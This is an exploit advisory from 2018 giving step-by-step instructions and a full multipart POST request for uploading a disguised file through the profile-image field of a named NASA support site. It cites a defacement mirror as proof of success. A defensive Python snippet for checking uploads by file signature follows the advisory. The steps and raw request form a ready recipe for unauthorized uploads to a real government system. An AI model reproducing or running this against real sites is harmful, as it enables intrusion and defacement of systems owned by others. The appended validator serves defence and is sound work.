NASA Submit Upload Exploit

2018.08.07
God3err (TR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

NASA Submit Upload Exploit
Founder : God3err

1) Open site https://support.earthdata.nasa.gov/
2) Create fake account
3) Install Live HTTP Headers and HTTP Requester
4) Open Live HTTP Header and rename index.html.jpg
5) Upload this file
6) Copy POST Request
7) Paste HTTP Requester and POST :))

POST https://support.earthdata.nasa.gov/index.php?/Base/UserAccount/ProfileSubmit

-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="salutation"\r\n
\r\n
0\r\n
-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="fullname"\r\n
\r\n
asfsafa safsafs\r\n
-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userorganization"\r\n
\r\n
\r\n
-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userdesignation"\r\n
\r\n
\r\n
-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="phone"\r\n
\r\n
\r\n
-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="profileimage"; filename="shell.txt.jpg(EDIT)"\r\n
Content-Type: image/jpeg\r\n
\r\n
Exploited By God3err\r\n
NASA Shell Explo!t\r\n
-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="sendemailtoall"\r\n
\r\n
1\r\n
-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="emaillist[]"\r\n
\r\n
******@*****.com(EDIT)\r\n
-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="_csrfhash"\r\n
\r\n
xca9fo1wjcsd4o3zwdtzlo5x3j3lio7v\r\n
-----------------------------25505821327763--\r\n

Success
E.g http://overflowzone.com/mirror/84863/

Video : https://youtu.be/2pL0_bEXhNc
Website : god3err.pw

References:

https://youtu.be/2pL0_bEXhNc
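
The profileimage part in the request above declares Content-Type: image/jpeg and a .jpg filename while its body is plain text. As an added example (not from the original advisory or from the affected application), here is a server-side check in Python that ignores both client-supplied values and decides on the file's leading bytes; the 2 MiB limit, the allowed types and the function names are assumptions.

```python
import secrets

# Leading-byte signatures for the image types a profile picture may use.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MIME = {"jpg": "image/jpeg", "png": "image/png", "gif": "image/gif"}
MAX_BYTES = 2 * 1024 * 1024  # assumed limit, not taken from the page


def sniff_image_type(data):
    """Return the type implied by the file's leading bytes, or None."""
    for ext, magics in SIGNATURES.items():
        if data.startswith(magics):
            return ext
    return None


def validate_profile_image(client_filename, client_content_type, data):
    """Return (accepted, detail, mismatch).

    The filename and Content-Type come from the multipart part headers,
    which the sender controls: the Content-Type is only compared with the
    detected type, and the filename is discarded.
    """
    if not data or len(data) > MAX_BYTES:
        return False, "empty or oversized upload", False
    detected = sniff_image_type(data)
    # A declared type that disagrees with the bytes is worth logging.
    mismatch = detected is None or MIME[detected] != client_content_type.lower()
    if detected is None:
        return False, "content is not a JPEG, PNG or GIF", mismatch
    # The stored name is generated server-side; client_filename is not reused.
    return True, f"{secrets.token_hex(16)}.{detected}", mismatch


# Constructed samples: the text body shown in the request above, and a
# minimal JPEG header (constructed, not a full image).
TEXT_PART = ("shell.txt.jpg", "image/jpeg",
             b"Exploited By God3err\r\nNASA Shell Explo!t\r\n")
JPEG_PART = ("me.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16)

if __name__ == "__main__":
    for part in (TEXT_PART, JPEG_PART):
        print(part[0], "->", validate_profile_image(*part))
```

Leading bytes only establish the header, so re-encoding accepted images and serving uploads from a location that never executes content remain necessary.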

